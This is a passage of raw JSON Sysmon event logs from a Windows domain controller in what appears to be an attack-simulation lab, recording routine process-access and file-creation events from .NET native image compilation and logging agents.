07:01:23.185","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001074D50A00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8057,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:23.185\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001074D50A00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:23.185","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001074D50A00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8058,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:23.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:23.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8059,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:24.153\r\nProcessGuid: {E2A3D6B1-1343-5F25-0000-001036BB0D00}\r\nProcessId: 5040\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13b0-0\\PresentationUI.dll\r\nCreationUtcTime: 2020-08-01 07:01:24.153","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:24.153","ProcessGuid":"{E2A3D6B1-1343-5F25-0000-001036BB0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13b0-0\\PresentationUI.dll","CreationUtcTime":"2020-08-01 07:01:24.153","EventReceivedTime":"2020-08-01 07:01:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8060,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:24.216\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1344-5F25-0000-00105DC10D00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:24.216","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1344-5F25-0000-00105DC10D00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8061,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:24.216\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1344-5F25-0000-00105DC10D00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:24.216","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1344-5F25-0000-00105DC10D00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8062,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:24.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1344-5F25-0000-00105DC10D00}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:24.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1344-5F25-0000-00105DC10D00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8063,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:24.325\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1344-5F25-0000-00102AC50D00}\r\nTargetProcessId: 4864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:24.325","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1344-5F25-0000-00102AC50D00}","TargetProcessId":"4864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8064,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:24.325\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1344-5F25-0000-00102AC50D00}\r\nTargetProcessId: 4864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:24.325","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1344-5F25-0000-00102AC50D00}","TargetProcessId":"4864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8065,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:24.325\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1344-5F25-0000-00102AC50D00}\r\nTargetProcessId: 4864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 